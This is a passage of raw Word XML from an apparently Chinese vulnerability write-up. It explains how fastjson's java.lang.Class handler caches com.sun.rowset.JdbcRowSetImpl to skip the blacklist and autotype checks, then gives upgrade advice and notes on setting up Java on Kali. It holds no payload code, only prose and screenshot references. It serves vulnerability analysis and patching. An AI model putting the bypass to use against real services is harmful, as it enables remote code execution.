      <w:r w:rsidRPr="00AF6629">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现原理是利将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF6629">
        <w:t>JdbcRowSetImpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF6629">
        <w:t>类加入</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF6629">
        <w:t>到mappings的缓存，在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF6629">
        <w:t>JdbcRowSetImpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AF6629">
        <w:t>类进</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF6629">
        <w:t>入黑名单过滤之前，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF6629">
        <w:t>fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF6629">
        <w:t>会先看缓存里面有没有这个类，有的话，就直接返回了。也就是没有走进黑名单过滤，就结束了check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26010B15" w14:textId="0D0C5C19" w:rsidR="007C2A8C" w:rsidRDefault="007C2A8C" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下断点调试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E346894" w14:textId="63D5E38D" w:rsidR="007C2A8C" w:rsidRPr="007C2A8C" w:rsidRDefault="007C2A8C" w:rsidP="007C2A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2A8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C2A8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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\EY7ZK0_NF)XG{T6QEIT3`M5.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007C2A8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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\EY7ZK0_NF)XG{T6QEIT3`M5.png"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082F6B4F">
          <v:shape id="_x0000_i1037" type="#_x0000_t75" alt="" style="width:449.25pt;height:126pt">
            <v:imagedata r:id="rId33" r:href="rId34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C2A8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3F95589" w14:textId="59AF7C57" w:rsidR="00EC0232" w:rsidRPr="00EC0232" w:rsidRDefault="00474F41" w:rsidP="00EC0232">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00474F41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在调用解析函数时我们没有传入预期的反序列化对象的对应类名时，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00474F41">
        <w:t>fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00474F41">
        <w:t>则通过从mappings中或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00474F41">
        <w:t>deserializers.findClass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00474F41">
        <w:t>()方法来获取反序列化对象的对应类</w:t>
      </w:r>
      <w:r w:rsidR="00EC0232">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，找到</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EC0232">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应类后便</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EC0232">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回，不再经过黑名单和</w:t>
      </w:r>
      <w:r w:rsidR="00EC0232">
        <w:t>autotype的检查流程。而</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC0232">
        <w:t>java.lang.class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC0232">
        <w:t>该类恰好存在于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC0232">
        <w:t>deserializers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC0232">
        <w:t>对象的buckets属性中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2621CE34" w14:textId="721BC22C" w:rsidR="00EC0232" w:rsidRPr="00EC0232" w:rsidRDefault="00EC0232" w:rsidP="00EC0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C02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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\773)7)_Q{](Y%$A{~[N25HO.png" \* MERGEFORMATINET </w:instrText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URE  "C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\773)7)_Q{](Y%$A{~[N25HO.png"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06CA9E26">
          <v:shape id="_x0000_i1038" type="#_x0000_t75" alt="" style="width:531.75pt;height:235.5pt">
            <v:imagedata r:id="rId35" r:href="rId36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18AAE9D" w14:textId="10598A24" w:rsidR="00EC0232" w:rsidRDefault="00EC0232" w:rsidP="00474F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56153708" w14:textId="555CB5F0" w:rsidR="00EC0232" w:rsidRDefault="00EC0232" w:rsidP="00474F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC0232">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0232">
        <w:t>MiscCodec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0232">
        <w:t>类中，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0232">
        <w:t>java.lang.class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0232">
        <w:t>拥有加载任意类到mappings中的功能。首先从输入的json串中解析获取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC0232">
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC0232">
        <w:t>对应的键值：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAAB6BA" w14:textId="07AA9E79" w:rsidR="00EC0232" w:rsidRPr="00EC0232" w:rsidRDefault="00EC0232" w:rsidP="00EC0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C02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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\57AN[3TDK%~@N3M~[W_L)HB.png" \* MERGEFORMATINET </w:instrText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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\57AN[3TDK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%~@N3M~[W_L)HB.png"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5C3E3CAE">
          <v:shape id="_x0000_i1039" type="#_x0000_t75" alt="" style="width:463.5pt;height:285.75pt">
            <v:imagedata r:id="rId37" r:href="rId38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AE8BF91" w14:textId="0C6DBBAB" w:rsidR="00EC0232" w:rsidRPr="00EC0232" w:rsidRDefault="00EC0232" w:rsidP="00EC0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C02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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\@384S[X_`[4MPJ_T~2CDKMX.png" \* MERGEFORMATINET </w:instrText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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\@384S[X_`[4MPJ_T~2CDKMX.png"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699BD935">
          <v:shape id="_x0000_i1040" type="#_x0000_t75" alt="" style="width:536.25pt;height:237pt">
            <v:imagedata r:id="rId39" r:href="rId40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C02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0BCAD73" w14:textId="68C54272" w:rsidR="00EC0232" w:rsidRDefault="00EC0232" w:rsidP="00474F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7292F982" w14:textId="0B7AF83A" w:rsidR="00BB42A1" w:rsidRDefault="00BB42A1" w:rsidP="00474F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07917043" w14:textId="718C6DBD" w:rsidR="00BB42A1" w:rsidRDefault="00BB42A1" w:rsidP="00474F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="187E6B79" w14:textId="77777777" w:rsidR="00BB42A1" w:rsidRDefault="00BB42A1" w:rsidP="00474F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3EBD15" w14:textId="009969D9" w:rsidR="00BB42A1" w:rsidRDefault="00BB42A1" w:rsidP="00474F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取后再调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>loadclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将键值</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行类加载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9730F7" w14:textId="345F5437" w:rsidR="00BB42A1" w:rsidRPr="00BB42A1" w:rsidRDefault="00BB42A1" w:rsidP="00BB42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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\3~664M1T`%G3~_DY499I6UQ.png" \* MERGEFORMATINET </w:instrText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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\3~664M1T`%G3~_DY499I6UQ.png" \* MERGEFORMATI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14A39C3A">
          <v:shape id="_x0000_i1041" type="#_x0000_t75" alt="" style="width:619.5pt;height:129pt">
            <v:imagedata r:id="rId41" r:href="rId42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AAB1D12" w14:textId="2011C1B6" w:rsidR="0024206C" w:rsidRDefault="00BB42A1" w:rsidP="00474F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就再</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>loadclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中,他就会</w:t>
      </w:r>
      <w:r w:rsidR="00474F41" w:rsidRPr="00474F41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00474F41" w:rsidRPr="00474F41">
        <w:t>com.sun.rowset.JdbcRowSetImpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00474F41" w:rsidRPr="00474F41">
        <w:t>放到那个mapping（缓存）里，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64411DEF" w14:textId="1C3409EA" w:rsidR="00825154" w:rsidRPr="00825154" w:rsidRDefault="00413FD9" w:rsidP="00474F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="00413FD9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="136D04FE" wp14:editId="5B208F4B">
            <wp:extent cx="6302878" cy="155257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5935" cy="15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8B1ACA" w14:textId="1CA6F2AC" w:rsidR="00BB42A1" w:rsidRPr="00BB42A1" w:rsidRDefault="00BB42A1" w:rsidP="00BB42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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\_BDDQLPM16S~_W%E1PN5URT.png" \* MERGEFORMATINET </w:instrText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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\_BDDQLPM16S~_W%E1PN5URT.png"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585BA30D">
          <v:shape id="_x0000_i1042" type="#_x0000_t75" alt="" style="width:491.25pt;height:219pt">
            <v:imagedata r:id="rId44" r:href="rId45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B3A4459" w14:textId="77777777" w:rsidR="00EC0232" w:rsidRDefault="00EC0232" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="515C8F53" w14:textId="761268C5" w:rsidR="00474F41" w:rsidRDefault="00474F41" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00474F41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而就像前面已经提到的，黑名单以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00474F41">
        <w:t>autotype开关的检查是在上面那处return</w:t>
      </w:r>
      <w:r w:rsidRPr="00474F41">
        <w:lastRenderedPageBreak/>
        <w:t>之后的，所以也就变相的绕过了黑名单以及autotype开关的检查。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A41A2" w14:textId="5A8A2424" w:rsidR="00474F41" w:rsidRPr="00BB42A1" w:rsidRDefault="00BB42A1" w:rsidP="00BB42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B42A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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\49C`A7CQB]W`08X$~~3)F~A.png" \* MERGEFORMATINET </w:instrText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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTem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p\\RichOle\\49C`A7CQB]W`08X$~~3)F~A.png"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0095A522">
          <v:shape id="_x0000_i1043" type="#_x0000_t75" alt="" style="width:579pt;height:249pt">
            <v:imagedata r:id="rId46" r:href="rId47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B42A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504EB22" w14:textId="0FB1AC2E" w:rsidR="00474F41" w:rsidRDefault="00474F41" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00474F41">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过了黑名单和</w:t>
      </w:r>
      <w:r w:rsidRPr="00474F41">
        <w:t>autotype</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E789ADC" w14:textId="0CE895B5" w:rsidR="00474F41" w:rsidRPr="00474F41" w:rsidRDefault="00474F41" w:rsidP="00474F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4F4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74F4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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\0FFSQL8AXVKN[DIA]QREET6.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00474F4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INCLUDEPICTURE  "C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>:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\0FFSQL8AXVKN[DIA]QREET6.png" \* MERGEFORMATINET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25154">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="4D59F0D3">
          <v:shape id="_x0000_i1044" type="#_x0000_t75" alt="" style="width:267.75pt;height:286.5pt">
            <v:imagedata r:id="rId48" r:href="rId49"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00D472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74F4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E2726FF" w14:textId="77777777" w:rsidR="00474F41" w:rsidRPr="00C44D32" w:rsidRDefault="00474F41" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40222D31" w14:textId="77777777" w:rsidR="00BB42A1" w:rsidRDefault="00BB42A1" w:rsidP="00421BA8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B08D928" w14:textId="77777777" w:rsidR="00BB42A1" w:rsidRDefault="00BB42A1" w:rsidP="00421BA8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B95A9E" w14:textId="7A2C92CE" w:rsidR="00421BA8" w:rsidRDefault="00421BA8" w:rsidP="00421BA8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
      <w:r w:rsidR="00E71E02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64484F87" w14:textId="77777777" w:rsidR="00E71E02" w:rsidRPr="00E71E02" w:rsidRDefault="00E71E02" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E71E02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用修补建议：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71E02">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E405885" w14:textId="77777777" w:rsidR="00E71E02" w:rsidRDefault="00E71E02" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E71E02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载升级</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E71E02">
        <w:t>软件包，下载链接为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FE8B3" w14:textId="5B89BDB9" w:rsidR="00E71E02" w:rsidRPr="00E71E02" w:rsidRDefault="00E71E02" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E71E02">
        <w:t>https://github.com/alibaba/fastjson</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE6012" w14:textId="132FCC62" w:rsidR="00E71E02" w:rsidRDefault="007A38D7" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="007A38D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最少升级到</w:t>
      </w:r>
      <w:r w:rsidRPr="007A38D7">
        <w:t>1.2.48以上版本且关闭autotype选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC08838" w14:textId="1436A42A" w:rsidR="007D48F5" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F448E3E" w14:textId="284E7CA8" w:rsidR="007D48F5" w:rsidRDefault="007D48F5" w:rsidP="007D48F5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置中遇到的问题:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66110083" w14:textId="36067023" w:rsidR="007D48F5" w:rsidRPr="00FC1719" w:rsidRDefault="00C8214D" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00FC1719">
        <w:t xml:space="preserve">kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00FC1719">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00FC1719">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00FC1719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00FC1719">
        <w:t>开启多个java</w:t>
      </w:r>
      <w:r w:rsidR="007D48F5" w:rsidRPr="00FC1719">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45380AAB" w14:textId="40EC5471" w:rsidR="007D48F5" w:rsidRPr="00FC1E81" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>在oracle下载到jdk-8u181-linux-x64.tar.gz后</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>解压到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>opt文件中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69591C1A" w14:textId="77777777" w:rsidR="007D48F5" w:rsidRPr="00FC1E81" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>然后配置vim  ~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>bashrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t xml:space="preserve">  这里网上也有说配置vim /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>/profile,但是我配置后没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>,很迷</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>在~/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>bashrc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>中添加如下语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7137EF5A" w14:textId="77777777" w:rsidR="007D48F5" w:rsidRPr="00FC1E81" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>export JAVA_HOME=/opt/jdk1.8.0_251</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E64D47" w14:textId="77777777" w:rsidR="007D48F5" w:rsidRPr="00FC1E81" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>export CLASSPATH=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>.:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>{JAVA_HOME}/lib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253B83FF" w14:textId="77777777" w:rsidR="007D48F5" w:rsidRPr="00FC1E81" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>export PATH=${JAVA_HOME}/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>bin:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B253CBD" w14:textId="6C076D13" w:rsidR="007D48F5" w:rsidRPr="00FC1E81" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>然后更新update-alternatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4A2D0C" w14:textId="77777777" w:rsidR="007D48F5" w:rsidRPr="00FC1E81" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>update-alternatives --install /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>/bin/java java /opt/jdk1.8.0_251/bin/java 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AF1CF2" w14:textId="7E195D79" w:rsidR="007D48F5" w:rsidRPr="00FC1E81" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>update-alternatives --install /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>javac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>javac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t xml:space="preserve"> /opt/jdk1.8.0_251/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>javac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23F645DC" w14:textId="77777777" w:rsidR="007D48F5" w:rsidRPr="00FC1E81" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t>update-alternatives --set java /opt/jdk1.8.0_251/bin/java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45704D6A" w14:textId="39E2C983" w:rsidR="007D48F5" w:rsidRPr="00FC1E81" w:rsidRDefault="007D48F5" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC1E81">
        <w:t xml:space="preserve">update-alternatives --set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1E81">
